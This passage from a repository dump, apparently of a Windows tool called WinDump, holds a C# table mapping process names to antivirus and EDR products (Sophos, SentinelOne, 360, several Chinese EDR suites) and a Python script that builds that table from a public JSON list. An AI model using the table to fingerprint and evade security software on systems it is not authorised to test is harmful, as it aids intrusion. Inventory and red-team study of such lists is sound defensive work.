{"edr_agent.exe", "深信服EDRAgent"}, 484 | {"edr_monitor.exe", "深信服EDRAgent"}, 485 | {"edr_sec_plan.exe", "深信服EDRAgent"}, 486 | {"rm_service.exe", "戎码翼龙 NG-EDR"}, 487 | {"rm_live.exe", "戎码翼龙 NG-EDR"}, 488 | {"rm_tray.exe", "戎码翼龙 NG-EDR"}, 489 | {"rm_hips.exe", "戎码翼龙 NG-EDR"}, 490 | {"ESAV.exe", "启明星辰天珣EDRAgent"}, 491 | {"ESCCControl.exe", "启明星辰天珣EDRAgent"}, 492 | {"ESCC.exe", "启明星辰天珣EDRAgent"}, 493 | {"ESCCIndex.exe", "启明星辰天珣EDRAgent"}, 494 | {"gse_win_agent.exe", "蓝鲸Agent"}, 495 | {"gse_win_daemon.exe", "蓝鲸Agent"}, 496 | {"LAVService.exe", "联想电脑管家"}, 497 | {"McsAgent.exe", "Sophos MCS Agent"}, 498 | {"McsClient.exe", "Sophos MCS Client"}, 499 | {"QHSafeMain.exe", "360TotalSecurity(360国际版)"}, 500 | {"QHSafeTray.exe", "360TotalSecurity(360国际版)"}, 501 | {"QHWatchdog.exe", "360TotalSecurity(360国际版)"}, 502 | {"sdcservice.exe", "Sophos Device Control Service"}, 503 | {"SEDService.exe", "Sophos Endpoint Defense Service"}, 504 | {"smartscreen.exe", "Windows Defender SmartScreen"}, 505 | {"SophosCleanM64.exe", "Sophos Clean Service"}, 506 | {"SophosFIMService.exe", "Sophos FIM"}, 507 | {"SSPService.exe", "Sophos System Protection Service"}, 508 | {"swc_service.exe", "Sophos Web Control Service"}, 509 | {"TitanAgent.exe", "天眼云镜"}, 510 | {"TitanMonitor.exe", "天眼云镜"}, 511 | {"TopsecMain.exe", "天融信终端防御"}, 512 | {"TopsecTray.exe", "天融信终端防御"}, 513 | {"wdswfsafe.exe", "360杀毒-网盾"}, 514 | {"WiseVector.exe", "智量安全"}, 515 | {"WiseVectorSvc.exe", "智量安全"}, 516 | {"QAXEntClient.exe", "天擎"}, 517 | {"QAXTray.exe", "天擎"}, 518 | {"AgentService.exe", "安恒主机卫士"}, 519 | {"ProtectMain.exe", "安恒主机卫士"}, 520 | {"Deep Security Manager.exe", "亚信DS服务端"}, 521 | {"dsa.exe", "亚信DS客户端"}, 522 | {"UniAccessAgent.exe", "亚信DS客户端"}, 523 | {"dsvp.exe", "亚信DS客户端"}, 524 | {"zabbix_agentd", "zabbix agen端"}, 525 | {"AliHips", "阿里系监控"}, 526 | {"AliNet", "阿里系监控"}, 527 | {"AliDetect", "阿里系监控"}, 528 | {"AliScriptEngine", "阿里系监控"}, 529 | {"secu-tcs-agent", "腾讯系监控"}, 530 | {"SentinelServiceHost.exe", "SentinelOne(哨兵一号)"}, 531 | {"SentinelStaticEngine.exe", "SentinelOne(哨兵一号)"}, 532 | {"SentinelStaticEngineScanner.exe", "SentinelOne(哨兵一号)"}, 533 | {"SentinelMemoryScanner.exe", "SentinelOne(哨兵一号)"}, 534 | {"SentinelAgent.exe", "SentinelOne(哨兵一号)"}, 535 | {"SentinelAgentWorker.exe", "SentinelOne(哨兵一号)"}, 536 | {"SentinelUI.exe", "SentinelOne(哨兵一号)"}, 537 | {"tbAgent.exe", "OneSec(微步)"}, 538 | {"tbAgentSrv.exe", "OneSec(微步)"}, 539 | {"tbGuard.exe", "OneSec(微步)"}, 540 | {"PccNT.exe", "亚信安全防毒墙网络版"}, 541 | {"PccNTUpd.exe", "亚信安全防毒墙网络版"}, 542 | {"venVtapServer.exe", "Illumio ZTS"}, 543 | {"venPlatformHandler.exe", "Illumio ZTS"}, 544 | {"venAgentMonitor.exe", "Illumio ZTS"}, 545 | {"venAgentMgr.exe", "Illumio ZTS"}, 546 | {"NuboshEndpoint.exe", "奇安信统一服务器安全"}, 547 | {"IMF.exe", "IObit Malware Fighter"}, 548 | {"IMFCore.exe", "IObit Malware Fighter"}, 549 | {"IMFsrv.exe", "IObit Malware Fighter"}, 550 | {"IMFSrvWsc.exe", "IObit Malware Fighter"}, 551 | }; -------------------------------------------------------------------------------- /av/todotnet.py: -------------------------------------------------------------------------------- 1 | import json 2 | from pathlib import Path 3 | # https://github.com/Aabyss-Team/Antivirus-Scan/blob/main/auto.json 4 | items = json.loads(Path("auto.json").read_bytes()) 5 | 6 | 7 | avmap = {} 8 | 9 | for av, info in items.items(): 10 | if av == "已知杀软进程,名称暂未收录": 11 | continue 12 | for process in info["processes"]: 13 | if "/" in process: 14 | continue 15 | if process in avmap: 16 | avmap[process] = av + " or " + avmap[process] 17 | else: 18 | avmap[process] = av 19 | with Path('out.txt').open('w',encoding='utf8') as f: 20 | f.write('static Dictionary av = new Dictionary {\n') 21 | for process,av in avmap.items(): 22 | f.write(f' {{"{process}", "{av}"}},\n') 23 | f.write("};") -------------------------------------------------------------------------------- /windump.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/howmp/WinDump/756ef446c38719c1071b84dffe42125925a7b7ca/windump.png --------------------------------------------------------------------------------